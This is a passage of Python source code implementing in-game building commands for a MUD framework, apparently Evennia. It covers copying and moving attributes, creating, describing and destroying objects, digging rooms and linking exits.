to_obj_aliases = ["%s_copy" % alias for alias in from_obj.aliases.all()]
copiedobj = ObjectDB.objects.copy_object(
from_obj, new_key=to_obj_name, new_aliases=to_obj_aliases
)
if copiedobj:
string = "Identical copy of %s, named '%s' was created." % (
from_obj_name,
to_obj_name,
)
else:
string = "There was an error copying %s."
else:
# we have specified =. This might mean many object targets
from_obj_name = self.lhs_objs[0]["name"]
from_obj = caller.search(from_obj_name)
if not from_obj:
return
for objdef in self.rhs_objs:
# loop through all possible copy-to targets
to_obj_name = objdef["name"]
to_obj_aliases = objdef["aliases"]
to_obj_location = objdef["option"]
if to_obj_location:
to_obj_location = caller.search(to_obj_location, global_search=True)
if not to_obj_location:
return
copiedobj = ObjectDB.objects.copy_object(
from_obj,
new_key=to_obj_name,
new_location=to_obj_location,
new_aliases=to_obj_aliases,
)
if copiedobj:
string = "Copied %s to '%s' (aliases: %s)." % (
from_obj_name,
to_obj_name,
to_obj_aliases,
)
else:
string = "There was an error copying %s to '%s'." % (from_obj_name, to_obj_name)
# we are done, echo to user
caller.msg(string)
class CmdCpAttr(ObjManipCommand):
"""
copy attributes between objects
Usage:
cpattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
cpattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]
Switches:
move - delete the attribute from the source object after copying.
Example:
cpattr coolness = Anna/chillout, Anna/nicety, Tom/nicety
->
copies the coolness attribute (defined on yourself), to attributes
on Anna and Tom.
Copy the attribute one object to one or more attributes on another object.
If you don't supply a source object, yourself is used.
"""
key = "@cpattr"
switch_options = ("move",)
locks = "cmd:perm(cpattr) or perm(Builder)"
help_category = "Building"
def check_from_attr(self, obj, attr, clear=False):
"""
Hook for overriding on subclassed commands. Checks to make sure a
caller can copy the attr from the object in question. If not, return a
false value and the command will abort. An error message should be
provided by this function.
If clear is True, user is attempting to move the attribute.
"""
return True
def check_to_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Checks to make sure a
caller can write to the specified attribute on the specified object.
If not, return a false value and the attribute will be skipped. An
error message should be provided by this function.
"""
return True
def check_has_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Do any preprocessing
required and verify an object has an attribute.
"""
if not obj.attributes.has(attr):
self.caller.msg("%s doesn't have an attribute %s." % (obj.name, attr))
return False
return True
def get_attr(self, obj, attr):
"""
Hook for overriding on subclassed commands. Do any preprocessing
required and get the attribute from the object.
"""
return obj.attributes.get(attr)
def func(self):
"""
Do the copying.
"""
caller = self.caller
if not self.rhs:
string = """Usage:
cpattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
cpattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
cpattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]"""
caller.msg(string)
return
lhs_objattr = self.lhs_objattr
to_objs = self.rhs_objattr
from_obj_name = lhs_objattr[0]["name"]
from_obj_attrs = lhs_objattr[0]["attrs"]
if not from_obj_attrs:
# this means the from_obj_name is actually an attribute
# name on self.
from_obj_attrs = [from_obj_name]
from_obj = self.caller
else:
from_obj = caller.search(from_obj_name)
if not from_obj or not to_objs:
caller.msg("You have to supply both source object and target(s).")
return
# copy to all to_obj:ects
if "move" in self.switches:
clear = True
else:
clear = False
if not self.check_from_attr(from_obj, from_obj_attrs[0], clear=clear):
return
for attr in from_obj_attrs:
if not self.check_has_attr(from_obj, attr):
return
if (len(from_obj_attrs) != len(set(from_obj_attrs))) and clear:
self.caller.msg("|RCannot have duplicate source names when moving!")
return
result = []
for to_obj in to_objs:
to_obj_name = to_obj["name"]
to_obj_attrs = to_obj["attrs"]
to_obj = caller.search(to_obj_name)
if not to_obj:
result.append("\nCould not find object '%s'" % to_obj_name)
continue
for inum, from_attr in enumerate(from_obj_attrs):
try:
to_attr = to_obj_attrs[inum]
except IndexError:
# if there are too few attributes given
# on the to_obj, we copy the original name instead.
to_attr = from_attr
if not self.check_to_attr(to_obj, to_attr):
continue
value = self.get_attr(from_obj, from_attr)
to_obj.attributes.add(to_attr, value)
if clear and not (from_obj == to_obj and from_attr == to_attr):
from_obj.attributes.remove(from_attr)
result.append(
"\nMoved %s.%s -> %s.%s. (value: %s)"
% (from_obj.name, from_attr, to_obj_name, to_attr, repr(value))
)
else:
result.append(
"\nCopied %s.%s -> %s.%s. (value: %s)"
% (from_obj.name, from_attr, to_obj_name, to_attr, repr(value))
)
caller.msg("".join(result))
class CmdMvAttr(ObjManipCommand):
"""
move attributes between objects
Usage:
mvattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
mvattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]
Switches:
copy - Don't delete the original after moving.
Move an attribute from one object to one or more attributes on another
object. If you don't supply a source object, yourself is used.
"""
key = "@mvattr"
switch_options = ("copy",)
locks = "cmd:perm(mvattr) or perm(Builder)"
help_category = "Building"
def func(self):
"""
Do the moving
"""
if not self.rhs:
string = """Usage:
mvattr[/switch] <obj>/<attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <obj>/<attr> = <obj1> [,<obj2>,<obj3>,...]
mvattr[/switch] <attr> = <obj1>/<attr1> [,<obj2>/<attr2>,<obj3>/<attr3>,...]
mvattr[/switch] <attr> = <obj1>[,<obj2>,<obj3>,...]"""
self.caller.msg(string)
return
# simply use cpattr for all the functionality
if "copy" in self.switches:
self.execute_cmd("cpattr %s" % self.args)
else:
self.execute_cmd("cpattr/move %s" % self.args)
class CmdCreate(ObjManipCommand):
"""
create new objects
Usage:
create[/drop] <objname>[;alias;alias...][:typeclass], <objname>...
switch:
drop - automatically drop the new object into your current
location (this is not echoed). This also sets the new
object's home to the current location rather than to you.
Creates one or more new objects. If typeclass is given, the object
is created as a child of this typeclass. The typeclass script is
assumed to be located under types/ and any further
directory structure is given in Python notation. So if you have a
correct typeclass 'RedButton' defined in
types/examples/red_button.py, you could create a new
object of this type like this:
create/drop button;red : examples.red_button.RedButton
"""
key = "@create"
switch_options = ("drop",)
locks = "cmd:perm(create) or perm(Builder)"
help_category = "Building"
# lockstring of newly created objects, for easy overloading.
# Will be formatted with the {id} of the creating object.
new_obj_lockstring = "control:id({id}) or perm(Admin);delete:id({id}) or perm(Admin)"
def func(self):
"""
Creates the object.
"""
caller = self.caller
if not self.args:
string = "Usage: create[/drop] <newname>[;alias;alias...] [:typeclass.path]"
caller.msg(string)
return
# create the objects
for objdef in self.lhs_objs:
string = ""
name = objdef["name"]
aliases = objdef["aliases"]
typeclass = objdef["option"]
# create object (if not a valid typeclass, the default
# object typeclass will automatically be used)
lockstring = self.new_obj_lockstring.format(id=caller.id)
obj = create.create_object(
typeclass,
name,
caller,
home=caller,
aliases=aliases,
locks=lockstring,
report_to=caller,
)
if not obj:
continue
if aliases:
string = "You create a new %s: %s (aliases: %s)."
string = string % (obj.typename, obj.name, ", ".join(aliases))
else:
string = "You create a new %s: %s."
string = string % (obj.typename, obj.name)
# set a default desc
if not obj.db.desc:
obj.db.desc = "You see nothing special."
if "drop" in self.switches:
if caller.location:
obj.home = caller.location
obj.move_to(caller.location, quiet=True)
if string:
caller.msg(string)
def _desc_load(caller):
return caller.db.evmenu_target.db.desc or ""
def _desc_save(caller, buf):
"""
Save line buffer to the desc prop. This should
return True if successful and also report its status to the user.
"""
caller.db.evmenu_target.db.desc = buf
caller.msg("Saved.")
return True
def _desc_quit(caller):
caller.attributes.remove("evmenu_target")
caller.msg("Exited editor.")
class CmdDesc(COMMAND_DEFAULT_CLASS):
"""
describe an object or the current room.
Usage:
desc [<obj> =] <description>
Switches:
edit - Open up a line editor for more advanced editing.
Sets the "desc" attribute on an object. If an object is not given,
describe the current room.
"""
key = "@desc"
switch_options = ("edit",)
locks = "cmd:perm(desc) or perm(Builder)"
help_category = "Building"
def edit_handler(self):
if self.rhs:
self.msg("|rYou may specify a value, or use the edit switch, but not both.|n")
return
if self.args:
obj = self.caller.search(self.args)
else:
obj = self.caller.location or self.msg("|rYou can't describe oblivion.|n")
if not obj:
return
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
self.caller.msg("You don't have permission to edit the description of %s." % obj.key)
return
self.caller.db.evmenu_target = obj
# launch the editor
EvEditor(
self.caller,
loadfunc=_desc_load,
savefunc=_desc_save,
quitfunc=_desc_quit,
key="desc",
persistent=True,
)
return
def func(self):
"""Define command"""
caller = self.caller
if not self.args and "edit" not in self.switches:
caller.msg("Usage: desc [<obj> =] <description>")
return
if "edit" in self.switches:
self.edit_handler()
return
if "=" in self.args:
# We have an =
obj = caller.search(self.lhs)
if not obj:
return
desc = self.rhs or ""
else:
obj = caller.location or self.msg("|rYou don't have a location to describe.|n")
if not obj:
return
desc = self.args
if obj.access(self.caller, "control") or obj.access(self.caller, "edit"):
obj.db.desc = desc
caller.msg("The description was set on %s." % obj.get_display_name(caller))
else:
caller.msg("You don't have permission to edit the description of %s." % obj.key)
class CmdDestroy(COMMAND_DEFAULT_CLASS):
"""
permanently delete objects
Usage:
destroy[/switches] [obj, obj2, obj3, [dbref-dbref], ...]
Switches:
override - The destroy command will usually avoid accidentally
destroying account objects. This switch overrides this safety.
force - destroy without confirmation.
Examples:
destroy house, roof, door, 44-78
destroy 5-10, flower, 45
destroy/force north
Destroys one or many objects. If dbrefs are used, a range to delete can be
given, e.g. 4-10. Also the end points will be deleted. This command
displays a confirmation before destroying, to make sure of your choice.
You can specify the /force switch to bypass this confirmation.
"""
key = "@destroy"
aliases = ["@delete", "@del"]
switch_options = ("override", "force")
locks = "cmd:perm(destroy) or perm(Builder)"
help_category = "Building"
confirm = True # set to False to always bypass confirmation
default_confirm = "yes" # what to assume if just pressing enter (yes/no)
def func(self):
"""Implements the command."""
caller = self.caller
delete = True
if not self.args or not self.lhslist:
caller.msg("Usage: destroy[/switches] [obj, obj2, obj3, [dbref-dbref],...]")
delete = False
def delobj(obj):
# helper function for deleting a single object
string = ""
if not obj.pk:
string = "\nObject %s was already deleted." % obj.db_key
else:
objname = obj.name
if not (obj.access(caller, "control") or obj.access(caller, "delete")):
return "\nYou don't have permission to delete %s." % objname
if obj.account and "override" not in self.switches:
return (
"\nObject %s is controlled by an active account. Use /override to delete anyway."
% objname
)
if obj.dbid == int(settings.DEFAULT_HOME.lstrip("#")):
return (
"\nYou are trying to delete |c%s|n, which is set as DEFAULT_HOME. "
"Re-point settings.DEFAULT_HOME to another "
"object before continuing." % objname
)
had_exits = hasattr(obj, "exits") and obj.exits
had_objs = hasattr(obj, "contents") and any(
obj
for obj in obj.contents
if not (hasattr(obj, "exits") and obj not in obj.exits)
)
# do the deletion
okay = obj.delete()
if not okay:
string += (
"\nERROR: %s not deleted, probably because delete() returned False."
% objname
)
else:
string += "\n%s was destroyed." % objname
if had_exits:
string += " Exits to and from %s were destroyed as well." % objname
if had_objs:
string += " Objects inside %s were moved to their homes." % objname
return string
objs = []
for objname in self.lhslist:
if not delete:
continue
if "-" in objname:
# might be a range of dbrefs
dmin, dmax = [utils.dbref(part, reqhash=False) for part in objname.split("-", 1)]
if dmin and dmax:
for dbref in range(int(dmin), int(dmax + 1)):
obj = caller.search("#" + str(dbref))
if obj:
objs.append(obj)
continue
else:
obj = caller.search(objname)
else:
obj = caller.search(objname)
if obj is None:
self.caller.msg(
" (Objects to destroy must either be local or specified with a unique #dbref.)"
)
elif obj not in objs:
objs.append(obj)
if objs and ("force" not in self.switches and type(self).confirm):
confirm = "Are you sure you want to destroy "
if len(objs) == 1:
confirm += objs[0].get_display_name(caller)
elif len(objs) < 5:
confirm += ", ".join([obj.get_display_name(caller) for obj in objs])
else:
confirm += ", ".join(["#{}".format(obj.id) for obj in objs])
confirm += " [yes]/no?" if self.default_confirm == "yes" else " yes/[no]"
answer = ""
answer = yield (confirm)
answer = self.default_confirm if answer == "" else answer
if answer and answer not in ("yes", "y", "no", "n"):
caller.msg(
"Canceled: Either accept the default by pressing return or specify yes/no."
)
delete = False
elif answer.strip().lower() in ("n", "no"):
caller.msg("Canceled: No object was destroyed.")
delete = False
if delete:
results = []
for obj in objs:
results.append(delobj(obj))
if results:
caller.msg("".join(results).strip())
class CmdDig(ObjManipCommand):
"""
build new rooms and connect them to the current location
Usage:
dig[/switches] <roomname>[;alias;alias...][:typeclass]
[= <exit_to_there>[;alias][:typeclass]]
[, <exit_to_here>[;alias][:typeclass]]
Switches:
tel or teleport - move yourself to the new room
Examples:
dig kitchen = north;n, south;s
dig house:myrooms.MyHouseTypeclass
dig sheer cliff;cliff;sheer = climb up, climb down
This command is a convenient way to build rooms quickly; it creates the
new room and you can optionally set up exits back and forth between your
current room and the new one. You can add as many aliases as you
like to the name of the room and the exits in question; an example
would be 'north;no;n'.
"""
key = "@dig"
switch_options = ("teleport",)
locks = "cmd:perm(dig) or perm(Builder)"
help_category = "Building"
# lockstring of newly created rooms, for easy overloading.
# Will be formatted with the {id} of the creating object.
new_room_lockstring = (
"control:id({id}) or perm(Admin); "
"delete:id({id}) or perm(Admin); "
"edit:id({id}) or perm(Admin)"
)
def func(self):
"""Do the digging. Inherits variables from ObjManipCommand.parse()"""
caller = self.caller
if not self.lhs:
string = "Usage: dig[/teleport] <roomname>[;alias;alias...]" "[:parent] [= <exit_there>"
string += "[;alias;alias..][:parent]] "
string += "[, <exit_back_here>[;alias;alias..][:parent]]"
caller.msg(string)
return
room = self.lhs_objs[0]
if not room["name"]:
caller.msg("You must supply a new room name.")
return
location = caller.location
# Create the new room
typeclass = room["option"]
if not typeclass:
typeclass = settings.BASE_ROOM_TYPECLASS
# create room
new_room = create.create_object(
typeclass, room["name"], aliases=room["aliases"], report_to=caller
)
lockstring = self.new_room_lockstring.format(id=caller.id)
new_room.locks.add(lockstring)
alias_string = ""
if new_room.aliases.all():
alias_string = " (%s)" % ", ".join(new_room.aliases.all())
room_string = "Created room %s(%s)%s of type %s." % (
new_room,
new_room.dbref,
alias_string,
typeclass,
)
# create exit to room
exit_to_string = ""
exit_back_string = ""
if self.rhs_objs:
to_exit = self.rhs_objs[0]
if not to_exit["name"]:
exit_to_string = "\nNo exit created to new room."
elif not location:
exit_to_string = "\nYou cannot create an exit from a None-location."
else:
# Build the exit to the new room from the current one
typeclass = to_exit["option"]
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
new_to_exit = create.create_object(
typeclass,
to_exit["name"],
location,
aliases=to_exit["aliases"],
locks=lockstring,
destination=new_room,
report_to=caller,
)
alias_string = ""
if new_to_exit.aliases.all():
alias_string = " (%s)" % ", ".join(new_to_exit.aliases.all())
exit_to_string = "\nCreated Exit from %s to %s: %s(%s)%s."
exit_to_string = exit_to_string % (
location.name,
new_room.name,
new_to_exit,
new_to_exit.dbref,
alias_string,
)
# Create exit back from new room
if len(self.rhs_objs) > 1:
# Building the exit back to the current room
back_exit = self.rhs_objs[1]
if not back_exit["name"]:
exit_back_string = "\nNo back exit created."
elif not location:
exit_back_string = "\nYou cannot create an exit back to a None-location."
else:
typeclass = back_exit["option"]
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
new_back_exit = create.create_object(
typeclass,
back_exit["name"],
new_room,
aliases=back_exit["aliases"],
locks=lockstring,
destination=location,
report_to=caller,
)
alias_string = ""
if new_back_exit.aliases.all():
alias_string = " (%s)" % ", ".join(new_back_exit.aliases.all())
exit_back_string = "\nCreated Exit back from %s to %s: %s(%s)%s."
exit_back_string = exit_back_string % (
new_room.name,
location.name,
new_back_exit,
new_back_exit.dbref,
alias_string,
)
caller.msg("%s%s%s" % (room_string, exit_to_string, exit_back_string))
if new_room and "teleport" in self.switches:
caller.move_to(new_room)
class CmdTunnel(COMMAND_DEFAULT_CLASS):
"""
create new rooms in cardinal directions only
Usage:
tunnel[/switch] <direction>[:typeclass] [= <roomname>[;alias;alias;...][:typeclass]]
Switches:
oneway - do not create an exit back to the current location
tel - teleport to the newly created room
Example:
tunnel n
tunnel n = house;mike's place;green building
This is a simple way to build using pre-defined directions:
|wn,ne,e,se,s,sw,w,nw|n (north, northeast etc)
|wu,d|n (up and down)
|wi,o|n (in and out)
The full names (north, in, southwest, etc) will always be put as
main name for the exit, using the abbreviation as an alias (so an
exit will always be able to be used with both "north" as well as
"n" for example). Opposite directions will automatically be
created back from the new room unless the /oneway switch is given.
For more flexibility and power in creating rooms, use dig.
"""
key = "@tunnel"
aliases = ["@tun"]
switch_options = ("oneway", "tel")
locks = "cmd: perm(tunnel) or perm(Builder)"
help_category = "Building"
# store the direction, full name and its opposite
directions = {
"n": ("north", "s"),
"ne": ("northeast", "sw"),
"e": ("east", "w"),
"se": ("southeast", "nw"),
"s": ("south", "n"),
"sw": ("southwest", "ne"),
"w": ("west", "e"),
"nw": ("northwest", "se"),
"u": ("up", "d"),
"d": ("down", "u"),
"i": ("in", "o"),
"o": ("out", "i"),
}
def func(self):
"""Implements the tunnel command"""
if not self.args or not self.lhs:
string = (
"Usage: tunnel[/switch] <direction>[:typeclass] [= <roomname>"
"[;alias;alias;...][:typeclass]]"
)
self.caller.msg(string)
return
# If we get a typeclass, we need to get just the exitname
exitshort = self.lhs.split(":")[0]
if exitshort not in self.directions:
string = "tunnel can only understand the following directions: %s." % ",".join(
sorted(self.directions.keys())
)
string += "\n(use dig for more freedom)"
self.caller.msg(string)
return
# retrieve all input and parse it
exitname, backshort = self.directions[exitshort]
backname = self.directions[backshort][0]
# if we recieved a typeclass for the exit, add it to the alias(short name)
if ":" in self.lhs:
# limit to only the first : character
exit_typeclass = ":" + self.lhs.split(":", 1)[-1]
# exitshort and backshort are the last part of the exit strings,
# so we add our typeclass argument after
exitshort += exit_typeclass
backshort += exit_typeclass
roomname = "Some place"
if self.rhs:
roomname = self.rhs # this may include aliases; that's fine.
telswitch = ""
if "tel" in self.switches:
telswitch = "/teleport"
backstring = ""
if "oneway" not in self.switches:
backstring = ", %s;%s" % (backname, backshort)
# build the string we will use to call dig
digstring = "dig%s %s = %s;%s%s" % (telswitch, roomname, exitname, exitshort, backstring)
self.execute_cmd(digstring)
class CmdLink(COMMAND_DEFAULT_CLASS):
"""
link existing rooms together with exits
Usage:
link[/switches] <object> = <target>
link[/switches] <object> =
link[/switches] <object>
Switch:
twoway - connect two exits. For this to work, BOTH <object>
and <target> must be exit objects.
If <object> is an exit, set its destination to <target>. Two-way operation
instead sets the destination to the *locations* of the respective given
arguments.
The second form (a lone =) sets the destination to None (same as
the unlink command) and the third form (without =) just shows the
currently set destination.
"""
key = "@link"
locks = "cmd:perm(link) or perm(Builder)"
help_category = "Building"
def func(self):
"""Perform the link"""
caller = self.caller
if not self.args:
caller.msg("Usage: link[/twoway] <object> = <target>")
return
object_name = self.lhs
# try to search locally first
results = caller.search(object_name, quiet=True)
if len(results) > 1: # local results was a multimatch. Inform them to be more specific
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit(".", 1))
return _AT_SEARCH_RESULT(results, caller, query=object_name)
elif len(results) == 1: # A unique local match
obj = results[0]
else: # No matches. Search globally
obj = caller.search(object_name, global_search=True)
if not obj:
return
if self.rhs:
# this means a target name was given
target = caller.search(self.rhs, global_search=True)
if not target:
return
if target == obj:
self.caller.msg("Cannot link an object to itself.")
return
string = ""
note = "Note: %s(%s) did not have a destination set before. Make sure you linked the right thing."
if not obj.destination:
string = note % (obj.name, obj.dbref)
if "twoway" in self.switches:
if not (target.location and obj.location):
string = "To create a two-way link, %s and %s must both have a location" % (
obj,
target,
)
string += " (i.e. they cannot be rooms, but should be exits)."
self.caller.msg(string)
return
if not target.destination:
string += note % (target.name, target.dbref)
obj.destination = target.location
target.destination = obj.location
string += "\nLink created %s (in %s) <-> %s (in %s) (two-way)." % (
obj.name,
obj.location,
target.name,
target.location,
)
else:
obj.destination = target
string += "\nLink created %s -> %s (one way)." % (obj.name, target)
elif self.rhs is None:
# this means that no = was given (otherwise rhs
# would have been an empty string). So we inspect
# the home/destination on object
dest = obj.destination
if dest:
string = "%s is an exit to %s." % (obj.name, dest.name)
else:
string = "%s is not an exit. Its home location is %s." % (obj.name, obj.home)
else:
# We gave the command link 'obj = ' which means we want to
# clear destination.
if obj.destination:
obj.destination = None
string = "Former exit %s no longer links anywhere." % obj.name
else:
string = "%s had no destination to unlink." % obj.name
# give feedback
caller.msg(string.strip())
class CmdUnLink(CmdLink):
"""
remove exit-connections between rooms
Usage:
unlink <Object>
Unlinks an object, for example an exit, disconnecting
it from whatever it was connected to.
"""
# this is just a child of CmdLink
key = "unlink"
locks = "cmd:perm(unlink) or perm(Builder)"
help_key = "Building"
def func(self):
"""
All we need to do here is to set the right command
and call func in CmdLink
"""
caller = self.caller
if not self.args:
caller.msg("Usage: unlink <object>")
return
# This mimics 'link <obj> = ' which is the same as unlink
self.rhs = ""
# call the link functionality
super().func()
class CmdSetHome(CmdLink):
"""
set an object's home location
Usage:
sethome <obj> [= <home_location>]
sethom <obj>
The "home" location is a "safety" location for objects; they
will be moved there if their current location ceases to exist. All
objects should always have a home location for this reason.
It is also a convenient target of the "home" command.
If no location is given, just view the object's home location.
"""
key = "@sethome"
locks = "cmd:perm(sethome) or perm(Builder)"
help_category = "Building"
def func(self):
"""implement the command"""
if not self.args:
string = "Usage: sethome <obj> [= <home_location>]"
self.caller.msg(string)
return
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
if not self.rhs:
# just view
home = obj.home
if not home:
string = "This object has no home location set!"
else:
string = "%s's current home is %s(%s)." % (obj, home, home.dbref)
else:
# set a home location
new_home = self.caller.search(self.rhs, global_search=True)
if not new_home:
return
old_home = obj.home
obj.home = new_home
if old_home:
string = "Home location of %s was changed from %s(%s) to %s(%s)." % (
obj,
old_home,
old_home.dbref,
new_home,
new_home.dbref,
)
else:
string = "Home location of %s was set to %s(%s)." % (obj, new_home, new_home.dbref)
self.caller.msg(string)
class CmdListCmdSets(COMMAND_DEFAULT_CLASS):
"""
list command sets defined on an object
Usage:
cmdsets <obj>
This displays all cmdsets assigned
to a user. Defaults to yourself.
"""
key = "@cmdsets"
locks = "cmd:perm(listcmdsets) or perm(Builder)"
help_category = "Building"
def func(self):
"""list the cmdsets"""
caller = self.caller
if self.arglist:
obj = caller.search(self.arglist[0])
if not obj:
return
else:
obj = caller
string = "%s" % obj.cmdset
caller.msg(string)
class CmdName(ObjManipCommand):
"""
change the name and/or aliases of an object
Usage:
name <obj> = <newname>;alias1;alias2
Rename an object to something new. Use *obj to
rename an account.
"""
key = "@name"
aliases = ["@rename"]
locks = "cmd:perm(rename) or perm(Builder)"
help_category = "Building"
def func(self):
"""change the name"""
caller = self.caller
if not self.args:
caller.msg("Usage: name <obj> = <newname>[;alias;alias;...]")
return
obj = None
if self.lhs_objs:
objname = self.lhs_objs[0]["name"]
if objname.startswith("*"):
# account mode
obj = caller.account.search(objname.lstrip("*"))
if obj:
if self.rhs_objs[0]["aliases"]:
caller.msg("Accounts can't have aliases.")
return
newname = self.rhs
if not newname:
caller.msg("No name defined!")
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have right to edit this account %s." % obj)
return
obj.username = newname
obj.save()
caller.msg("Account's name changed to '%s'." % newname)
return
# object search, also with *
obj = caller.search(objname)
if not obj:
return
if self.rhs_objs:
newname = self.rhs_objs[0]["name"]
aliases = self.rhs_objs[0]["aliases"]
else:
newname = self.rhs
aliases = None
if not newname and not aliases:
caller.msg("No names or aliases defined!")
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have the right to edit %s." % obj)
return
# change the name and set aliases:
if newname:
obj.key = newname
astring = ""
if aliases:
[obj.aliases.add(alias) for alias in aliases]
astring = " (%s)" % (", ".join(aliases))
# fix for exits - we need their exit-command to change name too
if obj.destination:
obj.flush_from_cache(force=True)
caller.msg("Object's name changed to '%s'%s." % (newname, astring))
class CmdOpen(ObjManipCommand):
"""
open a new exit from the current room
Usage:
open <new exit>[;alias;alias..][:typeclass] [,<return exit>[;alias;..][:typeclass]]] = <destination>
Handles the creation of exits. If a destination is given, the exit
will point there. The <return exit> argument sets up an exit at the
destination leading back to the current room. Destination name
can be given both as a #dbref and a name, if that name is globally
unique.
"""
key = "@open"
locks = "cmd:perm(open) or perm(Builder)"
help_category = "Building"
new_obj_lockstring = "control:id({id}) or perm(Admin);delete:id({id}) or perm(Admin)"
# a custom member method to chug out exits and do checks
def create_exit(self, exit_name, location, destination, exit_aliases=None, typeclass=None):
"""
Helper function to avoid code duplication.
At this point we know destination is a valid location
"""
caller = self.caller
string = ""
# check if this exit object already exists at the location.
# we need to ignore errors (so no automatic feedback)since we
# have to know the result of the search to decide what to do.
exit_obj = caller.search(exit_name, location=location, quiet=True, exact=True)
if len(exit_obj) > 1:
# give error message and return
caller.search(exit_name, location=location, exact=True)
return None
if exit_obj:
exit_obj = exit_obj[0]
if not exit_obj.destination:
# we are trying to link a non-exit
string = "'%s' already exists and is not an exit!\nIf you want to convert it "
string += (
"to an exit, you must assign an object to the 'destination' property first."
)
caller.msg(string % exit_name)
return None
# we are re-linking an old exit.
old_destination = exit_obj.destination
if old_destination:
string = "Exit %s already exists." % exit_name
if old_destination.id != destination.id:
# reroute the old exit.
exit_obj.destination = destination
if exit_aliases:
[exit_obj.aliases.add(alias) for alias in exit_aliases]
string += " Rerouted its old destination '%s' to '%s' and changed aliases." % (
old_destination.name,
destination.name,
)
else:
string += " It already points to the correct place."
else:
# exit does not exist before. Create a new one.
lockstring = self.new_obj_lockstring.format(id=caller.id)
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
exit_obj = create.create_object(
typeclass,
key=exit_name,
location=location,
aliases=exit_aliases,
locks=lockstring,
report_to=caller,
)
if exit_obj:
# storing a destination is what makes it an exit!
exit_obj.destination = destination
string = (
""
if not exit_aliases
else " (aliases: %s)" % (", ".join([str(e) for e in exit_aliases]))
)
string = "Created new Exit '%s' from %s to %s%s." % (
exit_name,
location.name,
destination.name,
string,
)
else:
string = "Error: Exit '%s' not created." % exit_name
# emit results
caller.msg(string)
return exit_obj
def parse(self):
super().parse()
self.location = self.caller.location
if not self.args or not self.rhs:
self.caller.msg("Usage: open <new exit>[;alias...][:typeclass]"
"[,<return exit>[;alias..][:typeclass]]] "
"= <destination>")
raise InterruptCommand
if not self.location:
self.caller.msg("You cannot create an exit from a None-location.")
raise InterruptCommand
self.destination = self.caller.search(self.rhs, global_search=True)
if not self.destination:
raise InterruptCommand
self.exit_name = self.lhs_objs[0]["name"]
self.exit_aliases = self.lhs_objs[0]["aliases"]
self.exit_typeclass = self.lhs_objs[0]["option"]
def func(self):
"""
This is where the processing starts.
Uses the ObjManipCommand.parser() for pre-processing
as well as the self.create_exit() method.
"""
# Create exit
ok = self.create_exit(self.exit_name, self.location, self.destination,
self.exit_aliases, self.exit_typeclass)
if not ok:
# an error; the exit was not created, so we quit.
return
# Create back exit, if any
if len(self.lhs_objs) > 1:
back_exit_name = self.lhs_objs[1]["name"]
back_exit_aliases = self.lhs_objs[1]["aliases"]
back_exit_typeclass = self.lhs_objs[1]["option"]
self.create_exit(back_exit_name, self.destination, self.location, back_exit_aliases,
back_exit_typeclass)
def _convert_from_string(cmd, strobj):
"""
Converts a single object in *string form* to its equivalent python
type.
Python earlier than 2.6:
Handles floats, ints, and limited nested lists and dicts
(can't handle lists in a dict, for example, this is mainly due to
the complexity of parsing this rather than any technical difficulty -
if there is a need for set-ing such complex structures on the
command line we might consider adding it).
Python 2.6 and later:
Supports all Python structures through literal_eval as long as they
are valid Python syntax. If they are not (such as [test, test2], ie
without the quotes around the strings), the entire structure will
be converted to a string and a warning will be given.
We need to convert like this since all data being sent over the
telnet connection by the Account is text - but we will want to
store it as the "real" python type so we can do convenient
comparisons later (e.g. obj.db.value = 2, if value is stored as a
string this will always fail).
"""
# Use literal_eval to parse python structure exactly.
try:
return _LITERAL_EVAL(strobj)
except (SyntaxError, ValueError):
# treat as string
strobj = utils.to_str(strobj)
string = (
'|RNote: name "|r%s|R" was converted to a string. '
"Make sure this is acceptable." % strobj
)
cmd.caller.msg(string)
return strobj
except Exception as err:
string = "|RUnknown error in evaluating Attribute: {}".format(err)
return string
class CmdSetAttribute(ObjManipCommand):
"""
set attribute on an object or account
Usage:
set[/switch] <obj>/<attr>[:category] = <value>
set[/switch] <obj>/<attr>[:category] = # delete attribute
set[/switch] <obj>/<attr>[:category] # view attribute
set[/switch] *<account>/<attr>[:category] = <value>
Switch:
edit: Open the line editor (string values only)
script: If we're trying to set an attribute on a script
channel: If we're trying to set an attribute on a channel
account: If we're trying to set an attribute on an account
room: Setting an attribute on a room (global search)
exit: Setting an attribute on an exit (global search)
char: Setting an attribute on a character (global search)
character: Alias for char, as above.
Example:
set self/foo = "bar"
set/delete self/foo
set self/foo = $dbref(#53)
Sets attributes on objects. The second example form above clears a
previously set attribute while the third form inspects the current value of
the attribute (if any). The last one (with the star) is a shortcut for
operating on a player Account rather than an Object.
If you want <value> to be an object, use $dbef(#dbref) or
$search(key) to assign it. You need control or edit access to
the object you are adding.
The most common data to save with this command are strings and
numbers. You can however also set Python primitives such as lists,
dictionaries and tuples on objects (this might be important for
the functionality of certain custom objects). This is indicated
